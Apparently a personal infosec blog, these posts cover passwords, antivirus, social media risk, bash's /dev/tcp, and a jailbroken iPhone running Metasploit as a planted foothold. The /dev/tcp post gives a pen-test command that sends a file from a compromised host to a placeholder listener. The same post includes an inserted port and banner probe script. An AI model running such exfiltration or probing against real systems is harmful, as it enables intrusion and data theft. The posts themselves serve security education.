
Passwords and protecting yourself

Posted: April 10th, 2010 | Author: Matt | Filed under: Brain Dump, InfoSec | 1 Comment »

Recently there has been a spate of Gmail accounts being compromised by what sounds like poor passwords. This begs the question: what are we doing wrong? I’ve come to the following conclusions:

- We’re choosing poor passwords to begin with.
- We’re using shady third party providers for some reason.
- We’re using insecure methods to check mail.
- Someone somewhere knows something we don’t.

I know I’m stating the obvious here, but for the sake of my sanity I’m going to go through my process for choosing a password. As much as I really like this post, I don’t believe it’s really enough. When choosing a password I’ll take a favourite phrase, generally something obscure that only I will know. And yes, some of the time it’s related to the site I am saving a password for. Instead of rambling on about some obscure phrase only I know let’s take an example.

I have just created a Twitter account for @leethaX0r69 which I am going to use as a C&C page for my …wait…er..plans for world domination should not be published. Regardless. I’ll take that account and come up with something like “Leet HaX0r is now on Twitter”. From that phrase I’ll take the first letter of each word and get “LHinoT” which is pretty good (not really). Now let’s add a little spice into the mix and get “LH1n0T” which is marginally better. Finally, some padding to get this “&LH1n0T%”. That’s not too bad now is it. Eight characters, upper and lower case with some special characters for good measure. And it’s not based on anything in a dictionary.

There are a number of trains of thought on the topic of a good password. Some think that having a standard pass{word,phrase} with a slight change depending on what site you are using is fine. I’d disagree with that simply because I don’t like the idea of sharing a common password among sites, even if there are slight changes in it.

This brings me to password managers. I’ve been using 1Password for a while now and it’s awesome. No, they don’t sponsor this blog, nor do I receive any kickbacks from them. The basic idea is that I have one password to get into my 1Password database and I am then free to use extremely complex passwords for all my online stuff. Very neat. Yes, I am up a certain creek without a certain paddle if I’m stuck without my laptop, but that’s what 1Password for the iPhone is for. Alas, my iPhone died a horrible death and is now about to be taken apart with a screwdriver just because I can….

What do you do for passwords?
Am I crazy doing what I’m doing?

Let me know what you think…

And no…my password for Twitter is NOT &LH1n0T%

Or is it…


Malware/Anti-Virus

Posted: October 12th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec, malware | No Comments »

The days of signature based malware / trojan detection are over. We are now living in some of the most dangerous times to be using the Internet, so much so that I wonder if it’s even worth sticking around. Farming cats in the Karoo sounds like a far safer and less stressful job anyway. Long gone are the days when a cute character of the author’s choosing would run across your screen and moon you. These days, with humanity’s greed, it’s all about how quickly and easily a 0-day can be transformed into a working exploit which can either be sent out in a (spear)phishing attack or hosted on some web server with JavaScript doing the rest of the work. And the worst part of it all is that we are constantly playing catch-up.

When new malware is introduced into the ecosystem that is the Internet at large, we rely on someone catching a specimen of this malware and either analyzing it themselves or sending it through to one of the big AV vendors who will analyze it and produce a signature which will then disseminate out to paying customers. This whole process leaves gaps which are filled by zombies and eventually botnets which plague not only home users, but big corporates. No one is safe.

Conficker, while a great example of what can be done by the community at large, is still very badly understood. No one seems to know why it’s out there and what it’s truly capable of. The media didn’t help us at all around April 1st either with all the hype that went around. I think the awful catch phrase of “Cyber Katrina” was thrown around with gay abandon. Please don’t get me wrong, I am not bashing the groups who worked on the Conficker Working Group, they did tremendous work. I am just worried that there is a fairly serious piece of malware floating around which no one seems to really know the capabilities of.

What are we going to do about this? Switch to multi-engine scanning on our AV? Move to a more proactive IDS/IPS setup? How does this really help the little guy in the street? Do you think Joe Average who just wants to download the latest funny video from that site that needs that special codec from that other site that ends in .ru? Oh wait…I’ve gone cross eyed. Am I the only person who is still worried that we are relying on vendors whose principal goal is to make money for our anti-virus updates? They’re not going to do anything rash are they? Yes, they’re out to help us, but at what cost?

I fear I may have too many questions and doubts with not enough answers. All I know is that there is a very, very wild west (and east) out there and suddenly, running my web browser in a Virtual Machine or Live CD doesn’t sound like such a bad idea.

Hold that thought, I’m going to fire up VMware Fusion.


/dev/tcp

Posted: September 7th, 2009 | Author: Matt | Filed under: InfoSec, Tools | 2 Comments »

While messing around with netcat the other day for the SANS SEC560 class, Mr Skoudis mentioned a tool I haven’t come across. Strange considering I’ve been mucking around with Linux for a fairly significant amount of time.

I am talking about /dev/tcp.

What this nifty little “tool” allows you to do is extend bash programming into the TCP/UDP arena. You no longer have to use netcat for simple TCP/UDP testing scripts, just use /dev/tcp or /dev/udp….

Before going ahead with this you’ll want to make the character devices in /dev if they aren’t there already.

    mknod /dev/tcp c 30 36
    mknod /dev/udp c 30 39

It’s also worth noting that there is an issue with this on Ubuntu. You’re going to need to recompile Bash from source with the --enable-net-redirections option. It’s pretty easy to do, so there should be no reason not to.

The basic premise behind /dev/{tcp,udp} is you use it to read or write data from or to a remote server or service using simple bash commands and pipes.

An example would be you’re running a pen-test where you are unable to download, install or run third party applications on the compromised server. You need to get fileX off the server and have a netcat listener running on your external machine. No problem,

    cat fileX > /dev/tcp/yourserver/yourport

Awesome (and I am not referring to hot dogs).

What about reading a banner from a remote server?

    cat < /dev/tcp/yourserver/yourport

After that you’re only limited by your imagination and bash scripting skills as to what you can get done with this handy little tool. I’ll leave it to you guys and gals out there to come up with some scripts of your own. Feel free to mail them through to me, I’d be very interested to see how they work.
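As an added example (not from the original post), here is the banner-reading idea above wrapped in a reusable probe that handles the failure modes the one-liner ignores: a refused or filtered port, and a service that accepts the connection but never sends anything. It assumes bash with net redirections enabled and the coreutils `timeout` command; the host and port are whatever you pass in.

```shell
#!/bin/bash
# Added example, not code from the original post.
# A small TCP probe built on bash's /dev/tcp pseudo-device. The connection is
# opened on file descriptor 3 inside a child bash so that it works even when
# this file is sourced from a plain POSIX sh. Assumes bash with net
# redirections and the coreutils 'timeout' tool (both assumptions).

# tcp_probe HOST PORT [REQUEST]
# Opens a connection, optionally sends one request line, prints the first
# line the service returns (its banner, possibly empty) and exits 0. Exits
# non-zero when the port is closed/filtered or the connect takes too long.
tcp_probe() {
    host=$1; port=$2; request=${3-}
    timeout 5 bash -c '
        # The connect happens here; a refused or filtered port fails the exec.
        exec 3<>"/dev/tcp/$1/$2" || exit 1
        # Some services (HTTP, for example) only talk after being asked.
        [ -n "$3" ] && printf "%s\r\n" "$3" >&3
        # Bound the wait: read -t gives up after 3 s, leaving $line empty.
        IFS= read -r -t 3 line <&3
        printf "%s\n" "$line"
        exec 3<&- 3>&-
    ' _ "$host" "$port" "$request" 2>/dev/null
}

# port_open HOST PORT
# Quiet reachability check: 0 = a TCP connection was accepted, 1 = it was not.
port_open() {
    timeout 5 bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$1" "$2" 2>/dev/null
}

# Typical use (hypothetical host names, nothing on the page):
#   tcp_probe mail.example.test 25          # SMTP greets first
#   tcp_probe www.example.test 80 "HEAD / HTTP/1.0"   # HTTP needs a request
#   port_open 10.0.0.5 22 && echo "ssh reachable"
```

Because the connect is done by the shell itself, this works on a box where netcat is absent or forbidden, which is exactly the situation the post describes; the same property is worth remembering when you are the one reviewing what a hardened host can still reach.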


Security and Social Media

Posted: August 20th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec | 1 Comment »

The very fine, red line between love and hate.

I use Twitter a lot. Some have even said that it borders on the same unhealthy addiction I harbour for Scarlett Johansson, but that’s a story for another day. That said, I do not use Facebook, MySpace or any of the other big, popular, brain atrophying SocNets that plague the Internet that we all know and love today. What’s my point in all of this? I’m going to focus on Twitter here, but the same thought processes can really be applied across the board.

Social Networks are huge at the moment. For the most part I really don’t understand them nor believe what they do to the general populace is a good thing. When was the last time you actually picked up the phone, called someone and said “Hey, we’re buddies right? Let’s go have a cold beer and talk rubbish about something we both share a keen interest in…”? But I digress…

I use Twitter on a daily basis. I don’t follow too many people I would call friends. 85% of my “following” is made up of people and news sources in the Information Security space. I’m not going to list them here as that would just be silly. I find it really useful because I get up to the minute news from various sources around the world on news and the like. This is great because I get two things from it,

1. Up to date news on security topics, new exploits, new documents or discussions

2. Correlation. This in itself is great. From a news article alone, it’s very difficult to know, without digging deeper, whether that new 0-day for OpenSSH is real or not. With Twitter, you’ll hear about it AND get an in depth analysis from some of the biggest heads in security today. Very useful.

That said, you do get “false positives”. I have fallen prey to this a couple of times, but I’ve learned from it. The hype around the OpenSSH “0-day” that was doing the rounds a month or so prior to BH/DC. And let’s not even go near the problems with Twitter. No, wait, let’s…

I could go on for a while but I won’t.

What’s my point in all of this? Social media and security should really be mutually exclusive simply because of the inherent risks involved in the various Social Media networks these days. As security professionals and practitioners we should all be very wary of the various Social Network sites.

- Should we be using them in our “arsenal” as a source of information?
- Should we be participating in something that is being used to attack the hosts we are working very hard to protect?
- Should we be viewing this site that hosts malware, dodgy links (Yes, Bit.ly, we’re talking about you)?
- Can we even use it as a source that seems to be under increasing attack from around the world?

I do. And I find it very useful as I am sure most of the other people I follow do. So, at the end of the day, where does that leave us ?

Joe Public loves to be “social”. It’s only human nature. But that’s the problem, isn’t it? That’s the weak link. Joe Public is going to continue to use SM and because of that he’s going to continue to have his machine poked, prodded and at times pilfered by the bad guys using the same service. We can either deny this and carry on with our lives or we could set up the necessary precautions and use it to our advantage. The bad guys are…

So fire up your hardened web browser in your virtual machine that’s been set up just to run that browser and check it out. Make your own mind up. But for the love of all things holy, don’t click on that Shortened URL without thinking about it.


Of iPhones and Wifi

Posted: August 18th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec | 2 Comments »

Alternative Title: If I “rm -fr /” my iPhone, does Steve Jobs kill a kitten?


Setup.

So I haven’t had a chance to really get “hands on” with this simply because I have zero free time at the moment, so bear with me on this one.

We all know at least one annoying person with an Apple iPhone, right? I know, I am that annoying person with an iPhone. They really have changed the game entirely when it comes not only to mobile handsets, but also mobile PCs that can be placed within an environment and used as a device to pivot or maintain your foothold on that network.

Next.

Right, we have our iPhone (or I guess even your iPod touch, but I haven’t played with one of those), it has wireless. It has a nifty little power cable (or at least mine does) that’s pretty small and can be used to power the device from under a desk, in a random closet somewhere nearby or in that cable tray with a stray power box. What does that mean to you and I? Right now? Not much. But jailbreak the phone, stick on OpenSSH (or simply enable it in my case) and hey..what’s that? Metasploit?? No..surely not. Yes, ladies and gentlemen, you now have Metasploit installed and running from your iPhone. Think about that for a second. Let it really sink in.

Next.

So are you with me so far? We have a very small device, with fairly decent WiFi capability that has the ability to stay on until such time as it’s found or the attacker decides to come back and pick it up. What can an attacker do with this? Well, they could run any one (or many) of the built in web browser exploits and just wait. This would allow the attacker to spam anyone within the target business (anyone for a spot of spear whaling?) and no doubt get at least one machine compromised on the network. How is this useful to the attacker?

1. We have a remote shell on a compromised machine within the target network.

2. We could now use Meterpreter to maintain access and harvest as much information on that network as is physically possible. Believe me, this is a scary amount of information.

3. With that compromised host and the information gleaned from it, we can now deepen the foothold we have on the organization.

Next.

All of this is very scary. I’ve been experimenting with Metasploit and Meterpreter and I can say that it’s trivial to exploit the older versions of Internet Explorer. That’s one thing, but add to this the post exploitation bliss that is Meterpreter and you have a very nasty combination. The WinEnum script by Dark0perator pulls in so much useful information from the victim machine it becomes even more trivial to start building very comprehensive maps and other useful information on the target network. And the ringer? Meterpreter runs completely from memory. It’s not going to be detected by Anti-Virus either. Fine, I will see the broken IE process and kill it! Wrong, simply migrate the Meterpreter process from IE to something a little less suspect with the Migrate script. Beige coloured mold could do this stuff….

Done.

Yes, we’re done. We have an extremely portable device that can be used to leverage a foothold into a target network and then not only maintain but increase that foothold. What does this mean to security professionals? It means the attack surface is growing and generally there isn’t anything we can do about it. Why? Have you ever tried to tell your C-level exec to switch off the WiFi on his handset? You’re going to have another vector to worry about and it’s going to be the biggest worry of them all.

To sum it all up, end point security is tough. Very tough. But hopefully this post will do one thing (and hopefully it’s not make me look like an insane ranting person) and that’s get the thought processes going on what we can do. What policies and procedures can we implement to at least mitigate these issues? Can we separate these devices off into their own networks? Is this even viable in your environment?

Unfortunately I don’t have any of the answers for this. I probably only have more questions, but to me, that’s what this is about. Asking the right questions to at least get to the answers.